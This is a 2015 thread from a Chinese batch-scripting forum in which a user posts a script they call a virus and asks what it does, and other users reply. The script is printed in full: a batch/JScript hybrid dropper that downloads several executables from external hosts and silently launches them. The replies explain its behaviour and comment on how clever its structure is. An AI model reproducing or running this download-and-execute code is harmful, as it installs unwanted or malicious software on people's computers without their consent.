标题: [其他] 谁能解释一下这个病毒批处理代码的意思 [打印本页]
作者: 注册个几8 时间: 2015-8-16 18:27 标题: 谁能解释一下这个病毒批处理代码的意思
本帖最后由 注册个几8 于 2015-8-16 18:44 编辑
代码如下:- echo=1/*>nul
- @cls
- @echo off
- call :http "http://down.ssddl.com/xzrpdf_70247.exe" "c:\xzrpdf_70247.exe"
- call :http "http://down.ssddl.com/zupmopn_30394.exe" "c:\zupmopn_30394.exe"
- start c:\xzrpdf_70247.exe
- start c:\zupmopn_30394.exe
- call :http "http://down.ssddl.com/jKINSTALLERS_60_201153.exe" "c:\jKINSTALLERS_60_201153.exe"
- call :http "http://down.ssddl.com/t10021.exe" "c:\t10021.exe"
- call :http "http://down.ssddl.com/setupX071_32.exe" "c:\setupX071_32.exe"
- call :http "http://down.yinyue.fm/open/setup_3102-22942.exe" "c:\setup_3102-22942.exe"
- call :http "http://down.ssddl.com/setupX_2002_221.exe" "c:\setupX_2002_221.exe"
- start c:\jKINSTALLERS_60_201153.exe
- start c:\t10021.exe
- start c:\setupX071_32.exe
- start c:\setup_3102-22942.exe
- start c:\setupX_2002_221.exe
- goto :eof
- :http
- cscript -nologo -e:jscript "%~f0" "%~1" "%~2"
- goto :eof
- */
- var iLocal,iRemote,xPost,sGet;
- iLocal =WScript.Arguments(1);
- iRemote = WScript.Arguments(0);
- iLocal=iLocal.toLowerCase();
- xPost = new ActiveXObject("MSXML2.XMLHTTP.3.0");
- xPost.Open("GET",iRemote,0);
- xPost.Send();
- sGet = new ActiveXObject("ADODB.Stream");
- sGet.Mode = 3;
- sGet.Type = 1;
- sGet.Open();
- sGet.Write(xPost.responseBody);
- sGet.SaveToFile(iLocal,2);
- sGet.Close();
作者: 707093864 时间: 2015-8-16 19:14
应该是在指定的网站上下载一系列安装包进行安装,貌似是静默安装
作者: CrLf 时间: 2015-8-16 19:18
我靠,还有这么高档的病毒
作者: CrLf 时间: 2015-8-16 19:22
就是下一堆exe来安装咯
让人惊讶的是不光结构很好,而且居然还用了混编...
作者: chouxia 时间: 2015-8-17 09:55
玩病毒的也讲经济效益哈
科技是第一生产力啊
| 欢迎光临 批处理之家 (http://www.bathome.net/) |
Powered by Discuz! 7.2 |